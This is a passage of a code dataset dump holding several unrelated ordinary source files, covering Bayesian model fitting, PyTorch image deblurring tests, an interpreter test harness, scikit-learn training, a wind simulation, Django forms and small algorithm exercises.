return tmp;\n }\n}\ndata {\n int K; // number of states\n int N; // total number of observations\n real X[N]; // observations\n int state[N]; // index with the state number for each observation\n}\nparameters {\n real mu[K];\n real sigma[K];\n real g[K];\n // hyperparameters\n real sigma_mu;\n real sigma_sigma;\n real sigma_g;\n}\n\nmodel {\n // likelihood\n for (i in 1:N){\n X[i] ~ custom(mu[state[i]], sigma[state[i]], g[state[i]]);\n }\n // priors\n mu ~ normal(INSERT_MU,sigma_mu);\n sigma ~ normal(INSERT_SIGMA,sigma_sigma);\n g ~ normal(INSERT_G,sigma_g);\n\n // hyperpriors\n sigma_mu ~ normal(2,0.5);\n sigma_sigma ~ normal(0.5,0.5);\n sigma_g ~ normal(1.5,0.5);\n\n}\n\"\"\"\n\nprint('Sub-national fits starting...')\n\ndef fit_partial_pooling(stan_code, df, col, mu, sigma, g):\n stan_code = stan_code.replace('INSERT_MU', str(mu))\n stan_code = stan_code.replace('INSERT_SIGMA', str(sigma))\n stan_code = stan_code.replace('INSERT_G', str(g))\n\n model = pystan.StanModel(model_code=stan_code)\n stan_pp_data = {'K': 27, 'N': df.shape[0], \n 'X': df[col].values + 0.5,\n 'state': df['StateID'].values}\n fit = model.sampling(data=stan_pp_data, iter=ITER, seed=SEED, chains=CHAINS, n_jobs=-1,\n control={'adapt_delta': 0.8})\n print(fit)\n posterior_df = fit.to_dataframe()\n params_columns = posterior_df.columns.str.startswith('mu')+posterior_df.columns.str.startswith('sigma')+posterior_df.columns.str.startswith('g')\n posterior_df = posterior_df.loc[:,params_columns]\n return posterior_df\n\n\nstate_posteriors_gln = {}\nfor i in range(len(columns)):\n df = all_dfs[i]\n col = columns[i]\n print(col)\n stan_code = code_pp_gln\n mu = national_posteriors_gln[col]['mu'].values.mean()\n sigma = national_posteriors_gln[col]['sigma'].values.mean()\n g = national_posteriors_gln[col]['g'].values.mean()\n posterior = fit_partial_pooling(stan_code, df, col, mu, sigma, g)\n # add national estimates\n posterior = pd.concat([posterior, national_posteriors_gln[col]], axis=1, sort=False)\n state_posteriors_gln.update({col: posterior})\n # save the output\n posterior.to_csv(OUT_PATH + col +'-samples-gln.csv', index=False)\ndel posterior, df\n \n\nprint('GLN model fits done')\nprint('Time elapsed: ', round((time.time()-t0)/60,1), ' minutes')\n","sub_path":"python_scripts_fitting/gln_1.py","file_name":"gln_1.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"629353822","text":"import torch\nimport os\nimport random\nimport sys\nsys.path.append('/home-nfs/gilton/learned_iterative_solvers')\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torchvision import transforms\n\nimport operators.blurs as blurs\nfrom operators.operator import OperatorPlusNoise\nfrom utils.celeba_dataloader import CelebaTrainingDatasetSubset, CelebaTestDataset\nfrom networks.u_net import UnetModel\nfrom solvers.neumann import PrecondNeumannNet\nfrom testing import standard_testing\n\n# Parameters to modify\nn_epochs = 80\ncurrent_epoch = 0\nbatch_size = 8\nn_channels = 3\nlearning_rate = 0.001\nprint_every_n_steps = 10\nsave_every_n_epochs = 5\ninitial_eta = 0.1\n\ninitial_data_points = 10000\n# point this towards your celeba files\ndata_location = \"/share/data/vision-greg2/mixpatch/img_align_celeba/\"\n\nkernel_size = 5\n\n# modify this for your machine\nsave_location = \"/share/data/vision-greg2/users/gilton/gaussianblur_nonoise_precondneumann.ckpt\"\n\ngpu_ids = []\nfor ii in range(6):\n try:\n torch.cuda.get_device_properties(ii)\n print(str(ii), flush=True)\n if not gpu_ids:\n gpu_ids = [ii]\n else:\n gpu_ids.append(ii)\n except AssertionError:\n print('Not ' + str(ii) + \"!\", flush=True)\n\nprint(os.getenv('CUDA_VISIBLE_DEVICES'), flush=True)\ngpu_ids = [int(x) for x in gpu_ids]\n# device management\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nuse_dataparallel = len(gpu_ids) > 1\nprint(\"GPU IDs: \" + str([int(x) for x in gpu_ids]), flush=True)\n\n# Set up data and dataloaders\ntransform = transforms.Compose(\n [\n transforms.Resize((128, 128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ]\n)\n\ntest_dataset = CelebaTestDataset(data_location, transform=transform)\ntest_dataloader = torch.utils.data.DataLoader(\n dataset=test_dataset, batch_size=batch_size, shuffle=False, drop_last=True,\n)\n\n### Set up solver and problem setting\n\nforward_operator = blurs.GaussianBlur(sigma=5.0, kernel_size=kernel_size,\n n_channels=3, n_spatial_dimensions=2).to(device=device)\nmeasurement_process = forward_operator\n\ninternal_forward_operator = blurs.GaussianBlur(sigma=5.0, kernel_size=kernel_size,\n n_channels=3, n_spatial_dimensions=2).to(device=device)\n\n# standard u-net\nlearned_component = UnetModel(in_chans=n_channels, out_chans=n_channels, num_pool_layers=4,\n drop_prob=0.0, chans=32)\nsolver = PrecondNeumannNet(linear_operator=internal_forward_operator, nonlinear_operator=learned_component,\n lambda_initial_val=initial_eta, cg_iterations=6)\n\nif use_dataparallel:\n solver = nn.DataParallel(solver, device_ids=gpu_ids)\nsolver = solver.to(device=device)\n\nstart_epoch = 0\ncpu_only = not torch.cuda.is_available()\n\n\nif os.path.exists(save_location):\n if not cpu_only:\n saved_dict = torch.load(save_location)\n else:\n saved_dict = torch.load(save_location, map_location='cpu')\n solver.load_state_dict(saved_dict['solver_state_dict'])\nelse:\n print(\"JUST SO YOU KNOW, YOUR CHECKPOINT DOES NOT EXIST. CONTINUING WITH A RANDOMLY-INITIALIZED SOLVER.\")\n\n\n# set up loss and train\nlossfunction = torch.nn.MSELoss()\n\n# Do train\nstandard_testing.test_solver(solver=solver, test_dataloader=test_dataloader,\n measurement_process=measurement_process, device=device)","sub_path":"testing/celeba/gaussian_blur_nonoise_precondneumann.py","file_name":"gaussian_blur_nonoise_precondneumann.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553103020","text":"#Lucas Faletra\n\nfrom J0__init__ import *\nfrom J1__init__ import *\n\n\n\ndef J1_test_basic(J, n, expected):\n print(\"J1_task9: test \", n)\n print(J.show())\n if str(J.show()) == expected:\n print(\"test \", n, \" passed\")\n else:\n print(\"test \", n, \" failed\")\n\n\n\n\ndef J1_test_interp(J, n, expected):\n print(\"J1_task11: test \", n)\n print(J.interp().show())\n if str(J.interp().show()) == expected:\n print(\"test \", n, \" passed\")\n else:\n print(\"test \", n, \" failed\")\n\n\n\n\n#some very quick tests for find_redex\ndef J1_tests():\n\n #test for simple context_if and redex\n #redex is used in the interp method and plug is used in the redex function\n \n\n a = JIf(JBool(\"true\"), desugar(SE_Num(4)), desugar(SE_Num(68)))\n print(\"expected value of a is: \" + a.interp().show())\n \n b = (Context_IF(a)).interp()\n print(\"actual output of find redex: \" + b.show())\n\n\n \n\n ##############################################################\n\n\n \n a = desugar(SE_Cons(SE_str(\"+\"), SE_Cons(SE_Num(1), SE_Num(2))))\n print(\"expected value of a is: \", a.interp().show())\n\n b = (Context_Cons(a)).interp()\n print(\"actual output value of find_redex function: \" + b.show())\n\n\n\n\n\n#assume the C file will have a JCons or JAtom type constructed and this variable\n#is called test(created by Convert_HL)\ndef CK0_test(e):\n if isinstance(e, JCons):\n \n return\n elif isinstance(e, JIf):\n return c_pair\n elif isinstance(e, JNull) or isinstance(e, JPrim) or isinstance(e, JNumber) or isinstance(e, JBool):\n #construct pair from atom and Kret\n return\n else:\n print(\"CK0 was not given an if, cons or atom type in HL code\")\n return\n\n\n\n#this is the test for calling LL constructors on all possible J1 data types\n#if anything is wrong, gcc will give errors in the terminal\n#a new c file is produced each time HL_convert is called\n#that is because of testing purposes it will be changed later\n\ndef HL_conversion():\n \n ########################################################\n #IMPORTANT\n #CK0 takes expression in the form + 2 2, < 2 4, etc\n #putting in something like 2 + 2 will cause a seg fault\n ########################################################\n\n\n #moved beginning and end of C file to this function\n\n C_File = open(\"main.c\", \"w+\")\n LL_string = \"\"\n\n LL_string = LL_string + \"#include \\n#include \\n#include \\n\"\n LL_string = LL_string + \"#include \\\"J1.h\\\"\\n\\n\"\n LL_string = LL_string + \"int main(){\\n\"\n\n C_File.write(LL_string)\n C_File.close()\n\n\n a = JBool(\"true\")\n \n b = JNull()\n #a2 = JCons(a, b)\n c = JPrim(\">=\")\n c2 = JPrim(\"<\")\n add = JPrim(\"+\")\n sub = JPrim(\"-\")\n mult = JPrim(\"*\")\n #c2 = JCons(c, b)\n d = JNumber(68)\n d2 = JNumber(99)\n d3 = JNumber(2)\n d4 = JNumber(5)\n e = JCons(d, d2)\n ee = JCons(c, e)\n i_f = JIf(a, d, d2)\n J_app = JApp(c, e)\n \n #2<\n t1 = JCons(add, JCons(d3, d4))\n\n\n #test of if(2 < 5, 2, else 5)\n #2<\n #t2 = JCons(t1, t3)\n \n #more complex if statement\n #t3 = JIf(t2, d3, d4)\n \n #Convert_HL(a)\n #print(\"\\ntest 1 passed\\n\")\n #Convert_HL(b)\n #print(\"\\ntest 2 passed\\n\")\n #Convert_HL(c)\n #print(\"\\ntest 3 passed\\n\")\n #Convert_HL(d)\n #print(\"\\ntest 4 passed\\n\")\n #Convert_HL(d2)\n #print(\"\\ntest 5 passed\\n\")\n #Convert_HL(e)\n #print(\"\\ntest 6 passed\\n\")\n #Convert_HL(ee)\n #print(\"\\ntest 7 passed\\n\")\n Convert_HL(t1)\n \n #if(true, then 68, else 69)\n #this case passed successfully\n #Convert_HL(i_f)\n \n #print(\"\\ntest 8 passed\\n\")\n\n\n C_File = open(\"main.c\", \"a+\")\n\n\n #write pair to file\n C_File.write(c_pair(t1))\n C_File.write(\"CK0(p);\\n\")\n\n LL_string = \"\"\n \n LL_string += \"\\n return 0; \\n}\\n\\n\"\n C_File.write(LL_string)\n C_File.close()\n\n #after file has been created, attempt to compile and run with gcc\n\n\n\n subprocess.call([\"gcc\", \"main.c\", \"J1.h\", \"J1.c\"])\n print(\"attempting to compile C code\")\n executable = subprocess.call(\"./a.out\")\n print(\"running executable\")\n print(\"resulting output of executable is:\")\n print (executable)\n\n #Convert_HL(J_app)\n #print(\"\\ntest 9 passed\\n\")\n #print(\"all tests passed\")\n#SEXPR_TESTS()\n#J1_tests()\n#HL_conversion()\n\n\n\ndef main():\n #these are basic test functions that just call the data structures' print functions\n J1_test_basic(JNumber(desugar(SE_Num(10)).n), 1, \"10\") \n J1_test_basic(JNumber(desugar(SE_Num(1000)).n), 2, \"1000\")\n J1_test_basic(JBool(SE_str(\"true\").s), 3, \"true\")\n J1_test_basic(JBool(SE_str(\"false\").s), 4, \"false\")\n J1_test_basic(JPrim(SE_str(\"==\").s), 5, \"==\")\n J1_test_basic(JPrim(SE_str(\"<\").s), 6, \"<\") \n J1_test_basic(JPrim(SE_str(\">\").s), 7, \">\")\n J1_test_basic(JNull(), 8, \"empty\")\n J1_test_basic(JCons(JNumber(desugar(SE_Num(10)).n), JNumber(desugar(SE_Num(100)).n)), 9, \"(10 100)\")\n J1_test_basic(JCons(JNumber(desugar(SE_Num(99)).n), JNumber(desugar(SE_Num(23)).n)), 10, \"(99 23)\")\n J1_test_basic(JIf(JBool(SE_str(\"true\").s), JNumber(desugar(SE_Num(1)).n), JNumber(desugar(SE_Num(3)).n)), 11, \"(if true 1 else: 3)\")\n J1_test_basic(JIf(JBool(SE_str(\"false\").s), JNumber(desugar(SE_Num(0)).n), JNumber(desugar(SE_Num(3)).n)), 12, \"(if false 0 else: 3)\")\n\n\n\n #these tests call the J1 interpreter\n \n J1_test_interp(JNumber(10), 13, \"10\") \n J1_test_interp(JNumber(1000), 14, \"1000\")\n J1_test_interp(JBool(\"true\"), 15, \"true\")\n J1_test_interp(JBool(\"false\"), 16, \"false\")\n J1_test_interp(JPrim(\"==\"), 17, \"==\")\n J1_test_interp(JPrim(\"<\"), 18, \"<\") \n J1_test_interp(JPrim(\">\"), 19, \">\")\n J1_test_interp(JNull(), 20, \"empty\")\n J1_test_interp(JCons(JNumber(10), JNumber(100)), 21, \"(10 100)\")\n J1_test_interp(JCons(JNumber(99), JNumber(23)), 22, \"(99 23)\")\n J1_test_interp(JIf(JBool(\"true\"), JNumber(1), JPrim(\">\")), 23, \"1\")\n J1_test_interp(JIf(JBool(\"false\"), JNumber(0), JNull()), 24, \"0\")\n\n\n \n\n\n\n\nmain()\n \n \n \n \n \n","sub_path":"HL/J1_tests.py","file_name":"J1_tests.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"449328160","text":"# import library\nimport os\nimport pandas as pd \nfrom sklearn import preprocessing\nfrom sklearn import ensemble\nfrom sklearn import metrics\nfrom . import dispatcher\nimport joblib\n\n#TRAINING_DATA = None\nTRAINING_DATA = os.environ.get(\"TRAINING_DATA\")\n#FOLD = None\n\"\"\"\nTypeError: only list-like objects are allowed to be passed to isin(), you passed a [NoneType]\nthat's why change to int\n\"\"\"\nFOLD = int(os.environ.get(\"FOLD\"))\nMODEL = os.environ.get(\"MODEL\")\n\nFOLD_MAPPING = {\n 0: [1, 2, 3, 4],\n 1: [0, 2, 3, 4],\n 2: [0, 1, 3, 4],\n 3: [0, 1, 2, 4],\n 4: [0, 1, 2, 3]\n}\n# main\nif __name__ == \"__main__\":\n df = pd.read_csv(TRAINING_DATA)\n train_df = df[df.kfolds.isin(FOLD_MAPPING.get(FOLD))]\n valid_df = df[df.kfolds==FOLD]\n # setting trainig and validation target \n ytrain = train_df.target.values\n yvalid = valid_df.target.values\n # drop columns \n train_df = train_df.drop([\"id\", \"target\", \"kfolds\"], axis=1)\n valid_df = valid_df.drop([\"id\", \"target\", \"kfolds\"], axis=1)\n # order of variable is same\n valid_df = valid_df[train_df.columns]\n\n #encode the variables\n label_encoders = []\n for c in train_df.columns:\n lbl = preprocessing.LabelEncoder()\n lbl.fit(train_df[c].values.tolist() + valid_df[c].values.tolist())\n train_df.loc[:, c] = lbl.transform(train_df[c].values.tolist())\n valid_df.loc[:, c] = lbl.transform(valid_df[c].values.tolist())\n label_encoders.append((c, lbl))\n \n # now train\n clf = dispatcher.MODELS[MODEL] # GETTING MODEL FROM `dispatcher` via environment variable:'MODEL'\n clf.fit(train_df, ytrain)\n preds = clf.predict_proba(valid_df)[:, 1] # probability : proba\n #print(preds)\n\n # calculate AOC \n print(metrics.roc_auc_score(yvalid, preds))\n\n #Save the models\n joblib.dump(label_encoders, f\"models/{MODEL}_{FOLD}_label_encoder.pkl\")\n joblib.dump(clf, f\"models/{MODEL}_{FOLD}.pkl\")\n\n\"\"\"\nNote:\nCompute Area Under the Receiver Operating Characteristic Curve (ROC AUC) from prediction scores.\nthis implementation can be used with binary, multiclass and multilabel classification, \nbut some restrictions apply (see Parameters).\n \n sklearn.metrics.roc_auc_score(y_true, y_score, average='macro', sample_weight=None, max_fpr=None, multi_class='raise', labels=None)[source]¶\n\n\"\"\"\n\"\"\"\n joblib.dump(label_encoders, f\"models/{MODEL}_label_encoder.pkl\")\n joblib.dump(clf, f\"models/{MODEL}.pkl\")\n\"\"\"","sub_path":"competitions-1/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"289732329","text":"# 8. Write a Python function that takes a list and returns a new list with unique elements of the first line\n\n\ndef get_unique_item(my_list):\n unique_list = []\n print(\"The list is : %s\" % my_list)\n for item in my_list:\n if item not in unique_list:\n unique_list.append(item)\n return unique_list\n\n\nprint(\"The unique list is : %s\" % get_unique_item([2, 22, 4, 43, 3, 3, 2, 6]))\n\n# can be using set() function\n\n# def get_unique_item1(my_list):\n# unique_list = list(set(my_list))\n# return unique_list\n#\n# print(\"The list is : [2,22,4,43,3,3,2,6]\" )\n# print(get_unique_item1([2,22,4,43,3,3,2,6]))\n","sub_path":"Function-problems/function8.py","file_name":"function8.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"428572269","text":"import numpy\nfrom noise import snoise2\n\n\nclass WindSimulation(object):\n @staticmethod\n def is_applicable(world):\n return not world.has_wind()\n\n def execute(self, world, seed, freq, octave):\n assert seed is not None\n self.frequency = freq\n self.octaves = octave\n direction = self._calculate(self, world, 0.5, seed)\n world.set_wind_direction(direction)\n\n @staticmethod\n def _calculate(self, world, distorsion_factor, seed):\n NORTH = 0.0\n EAST = 0.25\n SOUTH = 0.5\n WEST = 0.75\n\n def _set_line_to_gradient(data, y, start_y, end_y, start_value, end_value):\n delta = float(end_y - start_y)\n start_affinity = float(end_y - y) / delta\n end_affinity = 1.0 - start_affinity\n value = start_value * start_affinity + end_value * end_affinity\n data[y] = value\n\n def _wrap(value):\n while value < 0.0:\n value += 1.0\n while value > 1.0:\n value -= 1.0\n return value\n\n # This is based on the algorithm described here: http://www.dungeonleague.com/2010/03/28/wind-direction/\n # We initially have a direction which depends only on the latitude:\n #\n # North Pole = South\n # North Circle = North\n # North Tropic = East\n # Equator = West\n # South Tropic = East\n # South Circle = South\n # South Pole = North\n #\n # Then we add noise to that\n\n NORTH_POLE = int(world.height * 0.0)\n NORTH_CIRCLE = int(world.height * 0.16)\n NORTH_TROPIC = int(world.height * 0.34)\n EQUATOR = int(world.height * 0.5)\n SOUTH_TROPIC = int(world.height * 0.66)\n SOUTH_CIRCLE = int(world.height * 0.84)\n SOUTH_POLE = int(world.height * 1.0)\n\n data = numpy.zeros((world.height, world.width), dtype=float)\n for y in range(NORTH_POLE, NORTH_CIRCLE):\n _set_line_to_gradient(data, y, NORTH_POLE, NORTH_CIRCLE, SOUTH, NORTH)\n for y in range(NORTH_CIRCLE, NORTH_TROPIC):\n _set_line_to_gradient(data, y, NORTH_CIRCLE, NORTH_TROPIC, NORTH, EAST)\n for y in range(NORTH_TROPIC, EQUATOR):\n _set_line_to_gradient(data, y, NORTH_TROPIC, EQUATOR, EAST, WEST)\n for y in range(EQUATOR, SOUTH_TROPIC):\n _set_line_to_gradient(data, y, EQUATOR, SOUTH_TROPIC, WEST, EAST)\n for y in range(SOUTH_TROPIC, SOUTH_CIRCLE):\n _set_line_to_gradient(data, y, SOUTH_TROPIC, SOUTH_CIRCLE, EAST, SOUTH)\n for y in range(SOUTH_CIRCLE, SOUTH_POLE):\n _set_line_to_gradient(data, y, SOUTH_CIRCLE, SOUTH_POLE, SOUTH, NORTH + 1.0)\n\n #\n # Generate noise\n #\n\n rng = numpy.random.RandomState(seed) # create our own random generator\n base = rng.randint(0, 4096)\n\n height = world.height\n width = world.width\n border = width / 4\n\n freq = self.frequency * self.octaves\n\n # This is a variable I am adding. It exists\n # so that worlds sharing a common seed but\n # different sizes will have similar patterns\n n_scale = 1024 / float(height)\n\n for y in range(height): # TODO: numpy\n for x in range(width):\n n = snoise2((x * n_scale) / freq, (y * n_scale) / freq, self.octaves, base=base)\n\n # Added to allow noise pattern to wrap around right and left.\n if x < border:\n n = (snoise2((x * n_scale) / freq, (y * n_scale) / freq, self.octaves, base=base) * x / border) + \\\n (snoise2(((x * n_scale) + width) / freq, (y * n_scale) / freq, self.octaves, base=base) * \\\n (border - x) / border)\n\n data[y, x] = _wrap(data[y, x] + n * distorsion_factor)\n\n return data\n","sub_path":"WorldEngine/worldengine/simulations/wind.py","file_name":"wind.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"152410976","text":"\"\"\"\nTwo words are a “reverse pair” if each is the reverse of the other. Write a program\nthat finds all the reverse pairs in the word list.\n\"\"\"\nimport bisect\nwith open(\"../c9/words.txt\") as fin:\n\tt=[i.strip() for i in fin]\n\tfor i in t:\n\t\tr=i[::-1]\n\t\ta=bisect.bisect_left(t,r)\n\t\tif a!=len(t) and t[a]==r:\n\t\t\tprint(a,i,r)\n","sub_path":"c10/e11.py","file_name":"e11.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"151981481","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom assignments.models import Assignment, Task, Problem\nfrom marks.services import MarkAPI\nfrom sheets.models import Sheet\nfrom utils.forms import FancyForm\n\n# Fields to show in forms\nFIELDS_TO_SHOW = ('name', 'grade_system', 'max_points')\n\n\n# Form for quick assignments/tasks/problems adding\nclass QuickAddForm(FancyForm, forms.Form):\n number_of_items = forms.IntegerField(max_value=50, min_value=1)\n\n\n# Basic form mixin for assignments/tasks/problems adding\nclass BaseAssignmentFormMixin(forms.BaseForm):\n def clean_max_points(self):\n max_points = self.cleaned_data['max_points']\n if max_points < 0:\n raise ValidationError(\"Use positive numbers\", code='invalid')\n if max_points > 1 and not max_points.is_integer():\n raise ValidationError(\"Use integer numbers for coefficient more than 1\", code='invalid')\n return max_points\n\n\n# Form for assignment adding\nclass AssignmentForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Assignment\n fields = FIELDS_TO_SHOW\n labels = {\n 'max_points': 'Max points/coefficient'\n }\n\n def save(self, commit=True, sheet=None):\n if sheet:\n self.instance.sheet = sheet\n super(AssignmentForm, self).save(commit)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for assignemnt\n MarkAPI.create_marks_for_assignment(self.instance, grade_system)\n return self.instance\n\n def __init__(self, *args, **kwargs):\n if 'sheet' in kwargs:\n self.sheet = kwargs.pop('sheet')\n if 'instance' in kwargs:\n self.instance = kwargs['instance']\n super(AssignmentForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'instance'):\n if self.instance.task_set.exists():\n self.fields.pop('grade_system')\n if self.instance.task_set.exists() or (\n hasattr(self,\n 'sheet') and self.sheet.overall_mark_system == Sheet.REGEX_SYSTEM):\n self.fields.pop('max_points')\n\n def clean_name(self):\n name = self.cleaned_data['name']\n if ((not hasattr(self, 'instance') or self.instance.name != name) and\n hasattr(self, 'sheet') and self.sheet.assignment_set.filter(name=name).exists()):\n raise ValidationError(\"There is assignment with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n\n\n# Form for task adding\nclass TaskForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Task\n fields = FIELDS_TO_SHOW\n\n def __init__(self, *args, **kwargs):\n if 'assignment' in kwargs:\n self.assignment = kwargs.pop('assignment')\n if 'instance' in kwargs:\n self.instance = kwargs['instance']\n super(TaskForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'instance'):\n if self.instance.problem_set.exists():\n self.fields.pop('grade_system')\n if self.instance.problem_set.exists() or (hasattr(self, 'assignment') and\n self.assignment.sheet.overall_mark_system == Sheet.REGEX_SYSTEM):\n self.fields.pop('max_points')\n\n def save(self, commit=True, assignment=None):\n if assignment:\n self.instance.assignment = assignment\n super(TaskForm, self).save(commit)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n if self.instance.assignment:\n MarkAPI.delete_mark_sets(self.instance.assignment)\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for task\n MarkAPI.create_marks_for_task(self.instance, grade_system)\n return self.instance\n\n def clean_name(self):\n name = self.cleaned_data['name']\n if ((not hasattr(self, 'instance') or self.instance.name != name) and\n hasattr(self, 'assignment') and self.assignment.task_set.filter(name=name).exists()):\n raise ValidationError(\"There is task with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n\n\n# Form for problem adding\nclass ProblemForm(FancyForm, BaseAssignmentFormMixin, forms.ModelForm):\n class Meta:\n model = Problem\n fields = FIELDS_TO_SHOW\n\n def __init__(self, *args, **kwargs):\n if 'task' in kwargs:\n self.task = kwargs.pop('task')\n if 'instance' in kwargs:\n self.old_name = kwargs['instance'].name\n super(ProblemForm, self).__init__(*args, **kwargs)\n if hasattr(self, 'task') and self.task.assignment.sheet.overall_mark_system == Sheet.REGEX_SYSTEM:\n self.fields.pop('max_points')\n\n def save(self, commit=True, task=None):\n if task:\n self.instance.task = task\n super(ProblemForm, self).save(commit)\n if task:\n task.problem_set.add(self.instance)\n if 'grade_system' in self.cleaned_data:\n grade_system = self.cleaned_data['grade_system']\n if self.instance.task:\n MarkAPI.delete_mark_sets(self.instance.task)\n MarkAPI.delete_mark_sets(self.instance)\n # Creation of marks for problem\n MarkAPI.create_marks_for_problem(self.instance, grade_system)\n return self.instance\n\n def clean_name(self):\n name = self.cleaned_data['name']\n if ((not hasattr(self, 'old_name') or self.old_name != name) and\n hasattr(self, 'task') and self.task.problem_set.filter(name=name).exists()):\n raise ValidationError(\"There is problem with '%(name)s' name already\", params={\n 'name': name\n }, code='invalid')\n return name\n","sub_path":"assignments/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"593559412","text":"import random\n\nclass Solution:\n def maxSubArray(self, nums):\n non_neg = [num for num in nums if num >= 0]\n if len(non_neg) == 0:\n return max(nums)\n\n # nums = self.group(nums)\n sub_res = 0\n res = 0\n for num in nums:\n sub_res = max(sub_res + num, 0)\n res = max(sub_res, res)\n return res\n\n # def sumTriple(self, nums):\n # if len(nums) == 3:\n # res = max(nums[0], nums[1], sum(nums))\n # if res == nums[0]:\n # return res, False\n # else:\n # return res, True\n # else:\n # prev, contious = self.sumTriple(nums[:-2])\n # if contious:\n # res = max(prev, nums[-1], prev + nums[-2] + nums[-1])\n # else:\n # res = max(prev, nums[-1])\n # if res == prev:\n # return res, False\n # else:\n # return res, True\n\n # def group(self, nums):\n # grouped = []\n # sub_res = nums[0]\n # factor = 1 if nums[0] >= 0 else -1\n # for num in nums[1:]:\n # if (num > 0 and factor > 0) or (num < 0 and factor < 0):\n # sub_res = sub_res + num\n # else:\n # grouped.append(sub_res)\n # sub_res = num\n # factor = factor * -1\n # else:\n # grouped.append(sub_res)\n # if grouped[0] < 0:\n # grouped = grouped[1:]\n # if grouped[-1] < 0:\n # grouped = grouped[:-1]\n # # print(grouped)\n # return grouped\n\n\n # def divide(self, nums, depth=0):\n # if len(nums) == 1:\n # return nums[0]\n # res = -1e5\n # print(depth)\n # for idx, num in enumerate(nums):\n # if num < 0:\n # if nums[idx - 1] + num < 0 or nums[idx + 1] + num < 0:\n # sum1 = sum(nums[:idx])\n # sum2 = sum(nums[idx+1:])\n # sub_res = max(self.divide(nums[:idx], depth+1), self.divide(nums[idx+1:], depth+1), sum1, sum2)\n # if sub_res > res:\n # res = sub_res\n # return res\n # print(sum1, nums1)\n # print(sum2, nums2)\n\n\n # return max(self.divide(nums1), self.divide(nums2), sum1, sum2)\n # if sum1 > sum2:\n # if len(nums1) == 1:\n # return sum1\n # return max(self.divide(nums1), sum1)\n # else:\n # if len(nums2) == 1:\n # return sum2\n # return max(self.divide(nums2), sum2)\n \n\nif __name__ == '__main__':\n sol = Solution()\n nums = [random.randint(-1000, 1000) for _ in range(50)]\n print(nums)\n print(sol.maxSubArray(nums))\n ","sub_path":"source code/53. Maximum Subarray.py","file_name":"53. Maximum Subarray.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"568026386","text":"import os\nimport time\nimport numpy as np\nimport pandas as pd\nfrom collections import Counter\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.metrics import balanced_accuracy_score\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\n\nplt.style.use('bmh')\n\nCOLORS = list(mcolors.CSS4_COLORS.keys())\nSMALL_SIZE = 12\nMEDIUM_SIZE = 14\nLARGE_SIZE = 16\n\n## plot style, fonts and colors\nplt.style.use('seaborn')\nplt.rc('font', size=SMALL_SIZE) # controls default text sizes\nplt.rc('axes', titlesize=SMALL_SIZE) # fontsize of the axes title\nplt.rc('axes', labelsize=MEDIUM_SIZE) # fontsize of the x and y labels\nplt.rc('xtick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('ytick', labelsize=SMALL_SIZE) # fontsize of the tick labels\nplt.rc('legend', fontsize=SMALL_SIZE) # legend fontsize\nplt.rc('figure', titlesize=LARGE_SIZE) # fontsize of the figure title\n\n\ndef load_data(pth, names=None, n_data_sets=4):\n\n print(\"... loading data\")\n if names is None:\n names = ['unit_nr', 'time', 'os_1', 'os_2', 'os_3']\n names += ['sensor_{0:02d}'.format(s + 1) for s in range(26)]\n\n dc = {}\n\n for i in range(n_data_sets):\n p = os.path.join(pth, 'RUL_FD00{}.txt'.format( i +1))\n df_RUL = pd.read_csv(p, sep= ' ', header=None, names=['RUL_actual'], index_col=False)\n p = os.path.join(pth, 'train_FD00{}.txt'.format( i +1))\n df_train = pd.read_csv(p, sep= ' ', header=None, names=names, index_col=False)\n p = os.path.join(pth, 'test_FD00{}.txt'.format( i +1))\n df_test = pd.read_csv(p, sep= ' ', header=None, names=names, index_col=False)\n s = 'FD_00{}'.format( i +1)\n dc[s] = {'df_RUL': df_RUL, 'df_train': df_train, 'df_test': df_test}\n\n\n return dc\n\ndef make_target(df, before_failure=10):\n \"\"\"\n For each time stamp we can calculate RUL by subtracting the it from the total_runtime\n both RUL and runtime will be appended to the df\n :param df:\n :param before_failure:\n :return:\n \"\"\"\n\n 